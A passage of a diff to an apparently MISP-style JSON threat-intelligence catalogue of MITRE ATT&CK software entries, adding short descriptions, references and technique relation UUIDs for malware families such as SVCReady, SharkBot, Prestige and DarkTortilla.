+ "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/"
+ ],
+ "synonyms": [
+ "Drinik"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "1d1b1558-c833-482e-aabb-d07ef6eae63d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2aa78dfd-cb6f-4c70-9408-137cfd96be49",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "32063d7f-0a39-440d-a4a3-2694488f96cc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "351ddf79-2d3a-41b4-9bef-82ea5d3ccd69",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4c58b7c6-a839-4789-bda9-9de33e4d4512",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "648f8051-1a35-46d3-b1d8-3a3f5cf2cc8e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "6a3f6490-9c44-40de-b059-e5940f246673",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "73c26732-6422-4081-8b63-6d0ae93d449e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b1c95426-2550-4621-8028-ceebf28b3a47",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b327a9c0-e709-495c-aa6e-00b042136e2b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c6421411-ae61-42bb-9098-73fddb315002",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e1c912a9-e305-434b-9172-8a6ce3ec9c4a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f05fc151-aa62-47e3-ae57-2d1b23d64bf6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "d6e009b7-df5e-447a-bfd2-d5b77374edfe",
+ "value": "Drinik - S1054"
+ },
{
"description": "[LoudMiner](https://attack.mitre.org/software/S0451) is a cryptocurrency miner which uses virtualization software to siphon system resources. The miner has been bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.(Citation: ESET LoudMiner June 2019)",
"meta": {
@@ -35374,6 +36883,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -35841,6 +37357,194 @@
"uuid": "92b03a94-7147-4952-9d5a-b4d24da7487c",
"value": "SDBbot - S0461"
},
+ {
+ "description": "[SVCReady](https://attack.mitre.org/software/S1064) is a loader that has been used since at least April 2022 in malicious spam campaigns. Security researchers have noted overlaps between [TA551](https://attack.mitre.org/groups/G0127) activity and [SVCReady](https://attack.mitre.org/software/S1064) distribution, including similarities in file names, lure images, and identical grammatical errors.(Citation: HP SVCReady Jun 2022)",
+ "meta": {
+ "external_id": "S1064",
+ "mitre_platforms": [
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1064",
+ "https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/"
+ ],
+ "synonyms": [
+ "SVCReady"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "29be378d-262d-4e99-b00d-852d573628e6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4bed873f-0b7d-41d4-b93a-b6905d1f90b0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "7230ded7-3b1a-4d6e-9735-d0ffd47af9f6",
+ "value": "SVCReady - S1064"
+ },
{
"description": "[RDFSNIFFER](https://attack.mitre.org/software/S0416) is a module loaded by [BOOSTWRITE](https://attack.mitre.org/software/S0415) which allows an attacker to monitor and tamper with legitimate connections made via an application designed to provide visibility and system management capabilities to remote IT techs.(Citation: FireEye FIN7 Oct 2019)",
"meta": {
@@ -37089,13 +38793,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "f7827069-0bf2-4764-af4f-23fae0d181b7",
"tags": [
@@ -37344,13 +39041,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "9ea525fa-b0a9-4dde-84f2-bcea0137b3c1",
@@ -37559,6 +39249,145 @@
"uuid": "20945359-3b39-4542-85ef-08ecb4e1c174",
"value": "StrongPity - S0491"
},
+ {
+ "description": "[SharkBot](https://attack.mitre.org/software/S1055) is a banking malware, first discovered in October 2021, that tries to initiate money transfers directly from compromised devices by abusing Accessibility Services.(Citation: nccgroup_sharkbot_0322)",
+ "meta": {
+ "external_id": "S1055",
+ "mitre_platforms": [
+ "Android"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1055",
+ "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/"
+ ],
+ "synonyms": [
+ "SharkBot"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "0cdd66ad-26ac-4338-a764-4972a1e17ee3",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "16d73b64-5681-4ea0-9af4-4ad86f7c96e8",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "1b51f5bc-b97a-498a-8dbd-bc6b1901bf19",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2282a98b-5049-4f61-9381-55baca7c1add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2bb20118-e6c0-41dc-a07c-283ea4dd0fb8",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "32063d7f-0a39-440d-a4a3-2694488f96cc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "39dd7871-f59b-495f-a9a5-3cb8cc50c9b2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4c58b7c6-a839-4789-bda9-9de33e4d4512",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "6c49d50f-494d-4150-b774-a655022d20a6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b1c95426-2550-4621-8028-ceebf28b3a47",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b327a9c0-e709-495c-aa6e-00b042136e2b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "bb4387ab-7a51-468b-bf5f-a9a8612f0303",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c6421411-ae61-42bb-9098-73fddb315002",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d1f1337e-aea7-454c-86bd-482a98ffaf62",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "ec4c4baa-026f-43e8-8f56-58c36f3162dd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "fd211238-f767-4599-8c0d-9dca36624626",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "9cd72f5c-bec0-4f7e-bb6d-296937116291",
+ "value": "SharkBot - S1055"
+ },
{
"description": "[WINDSHIELD](https://attack.mitre.org/software/S0155) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)",
"meta": {
@@ -37603,13 +39432,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "98e8a977-3416-43aa-87fa-33e287e9c14c",
@@ -38478,6 +40300,76 @@
"uuid": "f6d1d2cb-12f5-4221-9636-44606ea1f3f8",
"value": "OSInfo - S0165"
},
+ {
+ "description": "[TianySpy](https://attack.mitre.org/software/S1056) is a mobile malware primarily spread by SMS phishing between September 30 and October 12, 2021. [TianySpy](https://attack.mitre.org/software/S1056) is believed to have targeted credentials associated with membership websites of major Japanese telecommunication services.(Citation: trendmicro_tianyspy_0122) ",
+ "meta": {
+ "external_id": "S1056",
+ "mitre_platforms": [
+ "Android",
+ "iOS"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1056",
+ "https://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html"
+ ],
+ "synonyms": [
+ "TianySpy"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "29f1f56c-7b7a-4c14-9e39-59577ea2743c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3e091a89-a493-4a6c-8e88-d57be19bb98d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4c58b7c6-a839-4789-bda9-9de33e4d4512",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e2ea7f6b-8d4f-49c3-819d-660530d12b77",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "fcb11f06-ce0e-490b-bcc1-04a1623579f0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "fd6d56b2-d84e-4d2a-b37d-d4678d3e08a6",
+ "value": "TianySpy - S1056"
+ },
{
"description": "[SOUNDBITE](https://attack.mitre.org/software/S0157) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)",
"meta": {
@@ -38556,6 +40448,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
"tags": [
@@ -38735,13 +40634,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "f6ae7a52-f3b6-4525-9daf-640c083f006e",
@@ -38763,6 +40655,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
"tags": [
@@ -38830,6 +40729,89 @@
"uuid": "3d57dcc4-be99-4613-9482-d5218f5ec13e",
"value": "PolyglotDuke - S0518"
},
+ {
+ "description": "[Prestige](https://attack.mitre.org/software/S1058) ransomware has been used by [Sandworm Team](https://attack.mitre.org/groups/G0034) since at least March 2022, including against transportation and related logistics industries in Ukraine and Poland in October 2022.(Citation: Microsoft Prestige ransomware October 2022)",
+ "meta": {
+ "external_id": "S1058",
+ "mitre_platforms": [
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1058",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/"
+ ],
+ "synonyms": [
+ "Prestige"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "5d2be8b9-d24c-4e98-83bf-2f5f79477163",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "1da748a5-875d-4212-9222-b4c23ab861be",
+ "value": "Prestige - S1058"
+ },
{
"description": "[SNUGRIDE](https://attack.mitre.org/software/S0159) is a backdoor that has been used by [menuPass](https://attack.mitre.org/groups/G0045) as first stage malware. (Citation: FireEye APT10 April 2017)",
"meta": {
@@ -38885,6 +40867,223 @@
"uuid": "3240cbe4-c550-443b-aa76-cc2a7058b870",
"value": "SNUGRIDE - S0159"
},
+ {
+ "description": "[metaMain](https://attack.mitre.org/software/S1059) is a backdoor used by [Metador](https://attack.mitre.org/groups/G1013) to maintain long-term access to compromised machines; it has also been used to decrypt [Mafalda](https://attack.mitre.org/software/S1060) into memory.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022)",
+ "meta": {
+ "external_id": "S1059",
+ "mitre_platforms": [
+ "Windows"
+ ],
+ "refs": [
+ "https://assets.sentinelone.com/sentinellabs22/metador#page=1",
+ "https://attack.mitre.org/software/S1059",
+ "https://docs.google.com/document/d/1e9ZTW9b71YwFWS_18ZwDAxa-cYbV8q1wUefmKZLYVsA/edit#heading=h.lmnbtht1ikzm"
+ ],
+ "synonyms": [
+ "metaMain"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "143c0cbb-a297-4142-9624-87ffc778980b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "1c34f7aa-9341-4a48-bfab-af22e51aca6c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4933e63b-9b77-476e-ab29-761bc5b7d15a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4bed873f-0b7d-41d4-b93a-b6905d1f90b0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8868cb5b-d575-4a60-acb2-07d37389a2fd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f6dacc85-b37d-458e-b58d-74fc4bbf5755",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "df350889-4de9-44e5-8cb3-888b8343e97c",
+ "value": "metaMain - S1059"
+ },
{
"description": "[DEATHRANSOM](https://attack.mitre.org/software/S0616) is ransomware written in C that has been used since at least 2020, and has potential overlap with [FIVEHANDS](https://attack.mitre.org/software/S0618) and [HELLOKITTY](https://attack.mitre.org/software/S0617).(Citation: FireEye FiveHands April 2021)",
"meta": {
@@ -39009,6 +41208,222 @@
"uuid": "4e6b9625-bbda-4d96-a652-b3bb45453f26",
"value": "RemoteCMD - S0166"
},
+ {
+ "description": "[DarkTortilla](https://attack.mitre.org/software/S1066) is a highly configurable .NET-based crypter that has been possibly active since at least August 2015. [DarkTortilla](https://attack.mitre.org/software/S1066) has been used to deliver popular information stealers, RATs, and payloads such as [Agent Tesla](https://attack.mitre.org/software/S0331), AsyncRat, [NanoCore](https://attack.mitre.org/software/S0336), RedLine, [Cobalt Strike](https://attack.mitre.org/software/S0154), and Metasploit.(Citation: Secureworks DarkTortilla Aug 2022)",
+ "meta": {
+ "external_id": "S1066",
+ "mitre_platforms": [
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1066",
+ "https://www.secureworks.com/research/darktortilla-malware-analysis"
+ ],
+ "synonyms": [
+ "DarkTortilla"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "132d5b37-aac5-4378-a8dc-3127b18a73dc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "29be378d-262d-4e99-b00d-852d573628e6",
+ "tags": [
